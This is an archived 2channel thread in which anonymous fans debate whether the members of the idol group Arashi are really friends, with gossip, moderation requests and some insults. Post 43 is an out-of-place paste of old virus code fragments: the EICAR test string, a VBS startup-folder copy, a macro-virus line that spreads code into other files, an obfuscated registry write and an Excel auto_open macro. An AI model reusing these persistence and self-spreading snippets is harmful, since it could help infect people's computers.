5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

本当にあらちは仲が良いのか?その2

1 :ななしじゃにー:2006/12/19(火) 21:21:07 ID:Km7bA1Tu
1 名前:ななしじゃにー 2006/08/23(水) 18:00:01 ID:fMXtAOw6
わたしは嵐担なんで、嵐は仲良いと思いたいんです。
でも、「アオゾラ〜のメイキング見てたりすると
ニノと相葉ちゃんは松潤をよく思ってないのが分かりやすい」などと言う意見が
多数あるので、、、
皆さんはどう思いますか?

前スレ
本当にあらちは仲が良いのか?
http://tv8.2ch.net/test/read.cgi/jan/1156323601/

2 :ななしじゃにー:2006/12/19(火) 21:33:59 ID:+2MlP/pr
前スレで結論は出ました。
クソスレ立てた>1は死んで詫びろ。
糸冬了

3 :ななしじゃにー:2006/12/19(火) 22:45:20 ID:/3Vf1Rlv
あらちは仲良しじゃないです。

4 :ななしじゃにー:2006/12/19(火) 22:46:55 ID:VoLLNRs0
では、さっそく梅

5 :ななしじゃにー:2006/12/19(火) 23:16:55 ID:isCi0U8c
いきなり梅てないで削除依頼出せよ。

6 :ななしじゃにー:2006/12/20(水) 00:38:07 ID:5m4FrCO+
放っときゃそのうち勝手に落ちるものをわざわざ梅たりするから
次スレなんかたてられるんじゃねえか
ウマシカばっか

7 :ななしじゃにー:2006/12/20(水) 01:43:37 ID:HgWcGIES
あらち仲良しだよ〜

8 :ななしじゃにー:2006/12/20(水) 01:56:19 ID:kqPKeAd3
重複・およびローカルルール違反です。
・単発質問スレ厳禁
・タレント個人、似たような話題は1つのスレッドに統一してシリーズ化

本スレはコチラ
リベンジ会話の成立する嵐【316】
http://tv8.2ch.net/test/read.cgi/jan/1162920782/

9 :ななしじゃにー:2006/12/20(水) 02:10:07 ID:DVg2ZG0b
>6
じゃ書き込むな、ばーか



10 :ななしじゃにー:2006/12/20(水) 05:18:29 ID:RWfaZctp
そんなに気になるなら>1は直接本人達に聞いてきなよ。
どうせ腐女子とモメサが妄想語るだけのスレになるんだから。




11 :ななしじゃにー:2006/12/20(水) 10:44:15 ID:VOm4248g
全体的にまとまってる。
良グループ。ジャニ1。

12 :ななしじゃにー:2006/12/20(水) 11:29:42 ID:sOXkD9M9
ミソースープ
作る手は〜
優しさ〜に溢れてた〜



13 :ななしじゃにー:2006/12/20(水) 12:14:36 ID:Qse0s9cH
このスレ削除依頼出てる。
埋めるのも荒らし行為とみなされるよ。

14 :ななしじゃにー:2006/12/24(日) 22:03:22 ID:jr104b95
前スレで平安が滝をイジメてたとかいう話題出てたけど、
これ見ると案外本当なのかもと思ったよ。
http://www.youtube.com/watch?v=-oKg5cP2d0Y
滝に「地味でしたね」って言われた後の平安の顔が何となく恐いw

15 :ななしじゃにー:2006/12/24(日) 22:54:40 ID:mlP2xY9k
ぜひ、沢山の人に見てもらいたいね。
その映像をどう見たら怖く見えるのか。

16 :ななしじゃにー:2006/12/24(日) 23:03:38 ID:jr104b95
え?恐いだろこれ!
担の自分から見ると明らかに普段の平安の表情じゃないと思うんだけど。

17 :ななしじゃにー:2006/12/24(日) 23:12:37 ID:PkG1QTEZ
>>8により削除依頼が出ています。
一切のレス不要。

18 :ななしじゃにー:2007/01/09(火) 18:41:37 ID:1JE7EEp8
>>17
はい!

19 :ななしじゃにー:2007/01/09(火) 21:46:54 ID:5/licYMY
一番仲良しGは∞!!

20 :ななしじゃにー:2007/01/10(水) 10:40:57 ID:YLLfC0Ml
重複スレッドです。
>>8にて1回目の誘導。
誘導先が落ちている為、再誘導します。

リベンジ会話の成立する嵐【317】
http://tv8.2ch.net/test/read.cgi/jan/1166580181/


21 :ななしじゃにー:2007/01/10(水) 11:44:43 ID:xh/mE5O6
歪が白状しましたね。
嵐の中にいても歪はあんまり話さないらしい。

22 :ななしじゃにー:2007/01/10(水) 17:40:24 ID:O20e9KRy
>21
何で?

23 :ななしじゃにー:2007/01/12(金) 16:09:01 ID:XwTVs6ZR
居心地がいいから話さないんだろ?
気を使わないってこと

24 :ななしじゃにー:2007/01/13(土) 09:21:05 ID:oDk4G/4X
歪の話を聞いてるとそこまで友達!って感じでもないんだなと思うし
小僧の話を聞いてると本当の友達みたいに仲良いんだなと思うし
よくわからないな。

25 :ななしじゃにー:2007/01/16(火) 22:48:02 ID:FbEhtT7c
コンビスレでも見てろよ

26 :ななしじゃにー:2007/01/22(月) 06:15:53 ID:dxtzPBw5
歪は他メンバーの仲良しぶりがキモイらしい
性格も自分だけ違うんだと

27 :ななしじゃにー:2007/01/24(水) 21:53:23 ID:Wl0yiBkg
自分は初めて行った紺での歪と平安のイチャイチャっぷりに多少ひいたww
今は麻痺してしもたがよく考えるとキモ(ry
仲良いっていいねぇ

28 :ななしじゃにー:2007/01/25(木) 10:20:49 ID:gJB4ZD+4
>>27
kwsk

29 :ななしじゃにー:2007/01/26(金) 17:44:40 ID:lFKYC/MM
コンビスレ池

30 :ななしじゃにー:2007/01/26(金) 23:59:24 ID:T7Q71lCO
五人で仲が良い=平和ってこと。
普通は2:3とかに別れるけどみんな控え目だからそれがない


31 :ななしじゃにー:2007/01/28(日) 02:12:42 ID:5vfked14
松潤他4人見下し態度だからハブられw

32 :ななしじゃにー:2007/01/28(日) 11:57:47 ID:57kkuGEq
わざわざ別にスレ立ててやる必要あんの?
本スレでやれよ


33 :ななしじゃにー:2007/01/29(月) 15:11:26 ID:SWKrdiIM
ここは歪担による自虐マンセースレですか?
ドラマ板見てても思うが、P担と歪担は性格や手口が似てるから怖いね。
P担はPの一人勝ちで他麺は雑魚だと認識してるから、わざわざユニ内で浮いてる発言してる。
歪担もそうなんじゃねーの?w
わざとらしさがあるんだよね、どっちの担も。

34 :ななしじゃにー:2007/01/30(火) 02:49:50 ID:/YGkfGrp
嵐の仲良しは作りもの。

35 :ななしじゃにー:2007/01/30(火) 03:40:20 ID:LYQuRITM
嵐が仲良しなのは本物だと思う。
小さいころから仕事を一緒にしているし、
逆に、彼らって麺以外に友達がいるのかどうかが不安。
歪はナルシだから浮いてみえるだけだよ。
他麺はそれをわかって、達観してるだけでしょ。

36 :ななしじゃにー:2007/01/30(火) 03:50:08 ID:l8RwgJxX
ごくせんやきみぺ時代の歪知ってるからかな?
今の歪って全然ナルシストに見えないんだけど。
可愛いところもあるじゃん。

37 :ななしじゃにー:2007/01/30(火) 04:25:10 ID:N28FVZX4
みんなヘタレ時代を知らないの?

38 :ななしじゃにー:2007/01/30(火) 04:44:37 ID:joZU9xki
あらちには刺激がない。
みんな良い子過ぎ


39 :ななしじゃにー:2007/01/30(火) 05:18:33 ID:ZdE5JDD/
だがそこが(・∀・)イイ!!

40 :ななしじゃにー:2007/01/30(火) 06:46:10 ID:akOXuEIa
(・∀・)イイ!!!!

41 :ななしじゃにー:2007/01/30(火) 12:18:35 ID:XMIRE7l6
>>37
ヘタレの時の方がヨカタ

42 :ななしじゃにー:2007/01/30(火) 12:37:47 ID:ccrEfmUw
(・∀・)イイ!!

43 :ななしじゃにー:2007/01/31(水) 18:54:13 ID:EY2dIXkT
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


44 :ななしじゃにー:2007/02/04(日) 17:26:00 ID:FS48WdvK
好きだけどやっぱり仲良しに見えない。
歪が浮いてるように見える…

45 :ななしじゃにー:2007/02/04(日) 18:10:55 ID:1gEGMHGx
[sage]
>>44
実際浮いてるが、麺はそれもわかってるよ。歪は上手く溶け込めてる、みんなに気を使わせてもなくないか?

46 :ななしじゃにー:2007/02/04(日) 18:30:27 ID:/m0m+X8S
あれはキャラを作ってるんですよ

47 :ななしじゃにー:2007/02/04(日) 19:37:08 ID:mBP+VVKA
何まだこのスレあったのか。
おんなじ話をいつまでも、よく飽きないな…

48 :ななしじゃにー:2007/02/05(月) 15:37:14 ID:e9QuyxKV
削除依頼が出ています。

49 :ななしじゃにー:2007/02/07(水) 13:24:12 ID:Pk0KjC9F
出てません。

50 :ななしじゃにー:2007/02/16(金) 19:45:03 ID:8MUxsZdK
ユーチューブみたいに動画も投稿できる芸能人の秘蔵映像発見!!
みんなのお宝映像も投稿できるよ!
↓↓↓
http://tv9.2ch.net/test/read.cgi/actor/1170878857/54

9 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)